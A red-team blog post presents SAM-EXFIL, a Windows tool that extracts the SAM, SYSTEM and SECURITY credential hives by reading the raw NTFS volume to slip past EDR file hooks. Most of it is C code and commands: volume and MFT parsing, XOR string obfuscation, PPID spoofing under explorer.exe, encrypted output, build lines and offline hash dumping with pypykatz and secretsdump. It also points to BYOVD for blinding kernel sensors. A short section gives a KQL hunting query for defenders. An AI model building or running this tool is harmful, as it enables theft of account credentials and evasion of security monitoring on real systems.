Skip to main content

Command Palette

Search for a command to run...

SAM-EXFIL: Credential Extraction via Raw NTFS Volume Reads

Published
10 min read
SAM-EXFIL: Credential Extraction via Raw NTFS Volume Reads

As red teamers regularly operating against mature Windows environments, we frequently encounter endpoint detection and response solutions that monitor access to Windows credential hive files at the API level. The Windows registry hives — SAM, SYSTEM, and SECURITY — are perennial targets during post-exploitation, yet their extraction has become increasingly difficult as EDR vendors have invested heavily in detection coverage for the standard access paths.

This post documents the research and implementation of SAM-EXFIL, a credential extractor that bypasses both file-system locking and EDR API-level hooks by reading the target files directly from the raw NTFS volume, without invoking any file-system API on the credential files themselves. All testing was performed on Windows 10 and Windows 11 with Microsoft Defender enabled in real-time protection mode.


Background

The standard approaches to SAM extraction share a common weakness: they all pass through the Windows I/O Manager's file-system stack, where EDR minifilter drivers operate.

  • reg save and Volume Shadow Copy both result in a NtCreateFile call against the hive path, which is trivially intercepted by a kernel-mode filter.

  • SeBackupPrivilege with BackupRead still generates file-open events visible to ring-0 sensors.

  • In-memory approaches such as lsadump::sam via Mimikatz require additional privileges and introduce their own detection surface.

The question we sought to answer was whether it is possible to read the credential hives at a layer below the file system, where these interception mechanisms do not apply. The answer, as documented below, is yes — provided the caller holds local Administrator privileges.


The Core Technique

Windows exposes each NTFS volume as a raw block device accessible via the device namespace:

\\.\C:

Opening a handle to this path with GENERIC_READ grants sector-level read access to every byte on the volume. Critically, this handle carries no file path for EDR filters to evaluate — the request does not pass through the Name-Based Open Sequence of the Object Manager in the same way a named file open does.

HANDLE hVol = CreateFileA("\\\\.\\C:",
    GENERIC_READ,
    FILE_SHARE_READ | FILE_SHARE_WRITE,
    NULL, OPEN_EXISTING,
    FILE_FLAG_NO_BUFFERING, NULL);

With this handle, it becomes possible to parse NTFS on-disk structures entirely in userspace and locate the credential hive files without the operating system's filesystem layer being involved in serving the data.


Implementation

The tool resolves the path Windows\System32\config\SAM (and equivalently SYSTEM and SECURITY) through five discrete stages, each requiring only a small number of sector reads.

Stage 1 — Volume Boot Record

The first sector of the volume contains the NTFS VBR, which provides the geometry parameters required to navigate the filesystem: bytes per sector, sectors per cluster, and the Logical Cluster Number (LCN) at which $MFT begins.

typedef struct {
    uint8_t  oem_id[8];      // "NTFS    "
    uint16_t bps;            // bytes per sector
    uint8_t  spc;            // sectors per cluster
    uint64_t mft_lcn;        // $MFT start cluster
    int8_t   cpfr;           // FILE record size encoding
} NTFS_VBR;

Stage 2 — $MFT Run-List

Rather than loading the entire Master File Table into memory (typically 1.5 GB on a modern system drive), we read only record #0 of the MFT — located at mft_lcn * bytes_per_cluster — and extract the run-list from its non-resident $DATA attribute. This run-list describes the on-disk layout of the MFT as a series of (LCN, cluster_count) pairs, which is all that is needed to address any subsequent MFT record by number.

Stage 3 — NTFS B-tree Directory Traversal

NTFS directories are indexed as B+ trees, with entries sorted by filename. Each directory's MFT record contains a resident \(INDEX_ROOT attribute (type 0x90) holding the root node, and optionally a non-resident \)INDEX_ALLOCATION attribute (type 0xA0) for overflow nodes stored in 4 KB INDX blocks on disk.

Starting from MFT record #5 (the filesystem root), we descend the tree component by component. At each level, a binary search within the current node either yields the target entry or descends to a child node via the VCN pointer embedded at the tail of each IDX_ENTRY:

static uint64_t search_node(LOOKUP *lk, uint8_t *entries, uint32_t esz) {
    uint32_t off = 0;
    while (off + sizeof(IDX_ENTRY) <= esz) {
        IDX_ENTRY *ie = (IDX_ENTRY *)(entries + off);
        if (ie->flags & IE_END) {
            // descend into rightmost child if present
            if ((ie->flags & IE_NODE) && lk->ia_nruns) {
                int64_t vcn;
                memcpy(&vcn, entries + off + ie->entry_len - 8, 8);
                return follow_vcn(lk, vcn);
            }
            return 0;
        }
        FNAME *fn = (FNAME *)((uint8_t *)ie + sizeof(IDX_ENTRY));
        int cmp = _wcsicmp(name, lk->target);
        if (cmp == 0) return MFT_REF(ie->file_ref);
        if (cmp > 0) { /* descend left child */ }
        off += ie->entry_len;
    }
    return 0;
}

The full resolution of Windows\System32\config\SAM requires approximately 15–20 sector reads and completes in under one second.

Stage 4 — Update Sequence Array Fix-up

Before any FILE or INDX record can be interpreted, the Update Sequence Array must be applied. NTFS writes a sequence number to the last two bytes of each 512-byte sector within a record before committing it to disk, and stores the original values in the USA at the record header. This must be reversed in memory before parsing attributes:

static void apply_usa(uint8_t *rec, uint16_t usa_off, uint16_t usa_cnt, uint32_t sz) {
    uint16_t *usa = (uint16_t *)(rec + usa_off);
    for (uint16_t i = 1; i < usa_cnt && (uint32_t)(i * 512) <= sz; i++) {
        uint16_t *tgt = (uint16_t *)(rec + i * 512 - 2);
        *tgt = usa[i];
    }
}

Stage 5 — Data Extraction

With the target file's MFT record number resolved, we read its $DATA attribute (type 0x80). For non-resident files — which SAM, SYSTEM, and SECURITY invariably are — this yields another run-list describing the file's data clusters. We iterate over these clusters and write the output directly, with optional XOR encryption applied per-byte during the write loop.


OPSEC Hardening

The raw volume read eliminates API-level detection, but a number of additional controls were implemented to reduce the remaining detection surface.

Static String Obfuscation

Analysis of an early build with strings revealed that strings such as \\.\C:, NTFS, SAM, SYSTEM, Windows, and explorer.exe were present in plaintext in the .rdata section — an immediate indicator of the tool's purpose. All sensitive strings are now stored XOR'd with a fixed key (0x13) as byte arrays in the binary, and decoded onto the stack at runtime via a non-inlined function marked volatile to prevent the compiler constant-folding the XOR back into plaintext:

static __attribute__((noinline)) void deob(char *s, int n) {
    volatile uint8_t k = 0x13;
    for (int i = 0; i < n; i++) s[i] ^= k;
}

// "\\.\C:" stored as: { 0x4F, 0x4F, 0x3D, 0x4F, 0x50, 0x29 }
OBS(vol_path, 0x4F,0x4F,0x3D,0x4F,0x50,0x29);

Of particular note: GCC at -O2 will evaluate constant XOR expressions at compile time and store the decoded plaintext in .rodata unless volatile is used on the key variable. This was observed during testing and required explicit verification with strings against the compiled binary after each build change.

PPID Spoofing (--ghost)

When invoked with --ghost, the tool relaunches a worker child process with explorer.exe set as the parent via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS. From the perspective of an EDR's process tree telemetry, the credential extraction runs as a child of Explorer rather than of the invoking shell or C2 agent — a considerably less suspicious lineage.

UpdateProcThreadAttribute(attrList, 0,
    PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
    &hParent, sizeof(hParent), NULL, NULL);

CreateProcessA(NULL, child_cmd, NULL, NULL, FALSE,
    EXTENDED_STARTUPINFO_PRESENT | CREATE_NO_WINDOW,
    NULL, NULL, &si.StartupInfo, &pi);

Randomised Output Naming and Encryption (--xor)

With --xor active, each output file is assigned a random GUID-derived name in %TEMP% via CoCreateGuid, and its contents are XOR'd with a single-byte key generated by CryptGenRandom. This prevents the strings SAM, SYSTEM, and SECURITY from appearing as filenames in filesystem event telemetry, and ensures the file contents are not recognisable to automated scanning:

[*] XOR key: 0xA3
[*] Decrypt: python -c "k=0xA3;import sys;sys.stdout.buffer.write(bytes(b^k for b in open(sys.argv[1],'rb').read()))" <file> > SAM
[+] SAM      → C:\Users\rtx\AppData\Local\Temp\3F8A1C2D04B2.tmp
[+] SYSTEM   → C:\Users\rtx\AppData\Local\Temp\7D2E9F1A03C1.tmp
[+] SECURITY → C:\Users\rtx\AppData\Local\Temp\1A4B6E8C02D3.tmp

Defensive Considerations

It should be noted that while this technique bypasses user-mode API hooks and file-system-level monitoring, it does not bypass kernel-mode endpoint sensors. Drivers such as CrowdStrike Falcon's kernel sensor operate as minifilter drivers and intercept I/O Request Packets at the IRP_MJ_CREATE level, which includes raw volume device opens regardless of whether a file path is specified.

Defenders with kernel-mode telemetry can hunt for this technique using the following pattern: a process opens a handle to a volume device (\\.\C:, \\.\D: etc.) that is not a recognised system process, followed within a short window by the creation of temporary files in %TEMP%. In KQL:

DeviceEvents
| where ActionType == "CreateFile"
| where FolderPath matches regex @"\\\\\\\\.\\\\[A-Z]:"
| where InitiatingProcessFileName !in~ ("svchost.exe", "MsMpEng.exe", "System")
| project Timestamp, DeviceName, InitiatingProcessFileName,
          InitiatingProcessParentFileName, InitiatingProcessCommandLine

The PPID spoofing will cause InitiatingProcessParentFileName to report explorer.exe; correlating on the raw volume open event rather than relying solely on process lineage is therefore the more reliable detection approach.

For defenders without kernel telemetry, a YARA rule targeting the XOR-obfuscated byte sequences for \\.\C: and NTFS alongside the deobfuscation loop structure provides reasonable coverage against the compiled binary.


Demonstration

The tool running against a Windows 11 host with Microsoft Defender real-time protection enabled — SAM (128 KB), SYSTEM (21 MB), and SECURITY (64 KB) extracted cleanly:

Credential hashes recovered offline on Kali using pypykatz, showing NTLM hashes for all local accounts, LSA secrets, and DPAPI machine keys:


Usage

# Build (GCC / MinGW)
gcc -O2 -Wall -s -fno-asynchronous-unwind-tables \
    -o build/sam-exfil.exe mft-stealth2.c -lole32 -ladvapi32

# Standard extraction (Administrator required)
sam-exfil.exe --output C:\out

# With PPID spoofing and encrypted output
sam-exfil.exe --output C:\out --ghost --xor

# Offline parsing
pypykatz registry SYSTEM --sam SAM --security SECURITY
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

Limitations

This technique requires local Administrator privileges; the raw volume open is rejected by the kernel for unprivileged callers. Additionally, on BitLocker-encrypted volumes where the volume key is not present in memory (offline or pre-boot scenarios), the raw sectors will be ciphertext and the output will be unusable.

As noted above, kernel-mode endpoint sensors will observe the volume device open. The techniques described here are assessed to provide meaningful reduction in detection fidelity against user-mode-only EDR configurations, while offering a more modest improvement against mature, kernel-instrumented deployments. For higher-assurance engagements, porting this logic to a BOF (Beacon Object File) executing within the C2's trusted process context, or combining it with a BYOVD approach to temporarily blind the kernel sensor, would be the natural next step.


Source Code

The full source code, build scripts, and usage documentation are available on GitHub:

https://github.com/marcocarolasec/SAM-EXFIL


References

  • Workday Engineering — Leveraging Raw Disk Reads to Bypass EDR

  • libyal/libfsntfs — New Technologies File System (NTFS) format specification

  • skelsec/pypykatz — Offline registry hive parser

  • fortra/impacket — secretsdump.py offline credential extraction

M

Interesting. Thanks for share this information!